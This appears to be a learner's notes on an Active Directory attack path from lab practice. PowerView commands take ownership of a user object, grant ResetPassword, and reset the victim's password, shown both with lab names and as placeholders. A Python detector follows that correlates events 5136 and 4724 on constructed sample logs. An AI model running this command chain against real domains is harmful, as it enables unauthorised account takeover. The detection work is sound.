Active Directory attack paths (with exploitation) (will be updated as I learn more):
- Abusing WriteOwner rights:
a) Change the owner of claire to ourselves (tom).
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
Set-DomainObjectOwner -Identity <target-user> -OwnerIdentity <current-user>
b) Grant ourselves the ResetPassword right on the target (as the new owner we can edit its ACL).
Add-DomainObjectAcl -TargetIdentity htb\claire -PrincipalIdentity htb\tom -Rights ResetPassword
Add-DomainObjectAcl -TargetIdentity <target-user> -PrincipalIdentity <current-user> -Rights ResetPassword
c) Change the password.
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom -verbose
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -verbose
$newpass = ConvertTo-SecureString -String 'P@$$w0rd!1234' -AsPlainText -Force
Set-DomainUserPassword -Identity claire -AccountPassword $newpass -verbose
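Detection side of the chain above, as an added example that is not part of the original notes: it flags an account that modifies a user object's security descriptor (Security event 5136 on nTSecurityDescriptor) and then resets that same user's password (event 4724) shortly afterwards. The event records are constructed samples, the 30-minute window is an assumption, and matching the object's CN to the reset target's account name is a simplification. It also assumes directory service change auditing is enabled so that 5136 is logged.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)  # assumed correlation window, tune per environment

def sd_change(time, actor, cn):
    # Shape of a parsed 5136 event for a security-descriptor write (constructed).
    return {"time": time, "id": 5136, "SubjectUserName": actor, "ObjectClass": "user",
            "ObjectDN": f"CN={cn},CN=Users,DC=htb,DC=example",
            "AttributeLDAPDisplayName": "nTSecurityDescriptor"}

def pw_reset(time, actor, target):
    # Shape of a parsed 4724 event (password reset attempt), constructed.
    return {"time": time, "id": 4724, "SubjectUserName": actor, "TargetUserName": target}

# Constructed sample timeline, not real log data.
EVENTS = [
    sd_change("2024-01-01T09:00:00", "admin", "alice"),
    sd_change("2024-01-01T10:00:00", "tom", "claire"),    # owner change
    sd_change("2024-01-01T10:00:20", "tom", "claire"),    # DACL change
    pw_reset("2024-01-01T10:01:05", "tom", "claire"),     # reset right after
    pw_reset("2024-01-01T11:00:00", "helpdesk", "bob"),   # reset with no ACL change
    pw_reset("2024-01-01T12:00:00", "admin", "alice"),    # 3h after ACL change
]

def cn_of(dn):
    # First RDN value; assumes CN equals sAMAccountName and has no escaped commas.
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def find_acl_then_reset(events, window=WINDOW):
    """Return one alert per password reset preceded by SD writes from the same actor."""
    sd_writes, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        actor = ev["SubjectUserName"].lower()
        if (ev["id"] == 5136 and ev.get("ObjectClass") == "user"
                and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"):
            sd_writes.setdefault((actor, cn_of(ev["ObjectDN"])), []).append(when)
        elif ev["id"] == 4724:
            target = ev["TargetUserName"].lower()
            recent = [t for t in sd_writes.get((actor, target), []) if when - t <= window]
            if recent:
                alerts.append({"actor": actor, "target": target,
                               "sd_changes": len(recent), "reset_at": ev["time"]})
    return alerts

if __name__ == "__main__":
    for alert in find_acl_then_reset(EVENTS):
        print(alert)
```

In production, resolve the 5136 ObjectGUID and the 4724 TargetSid to the same directory object instead of comparing names.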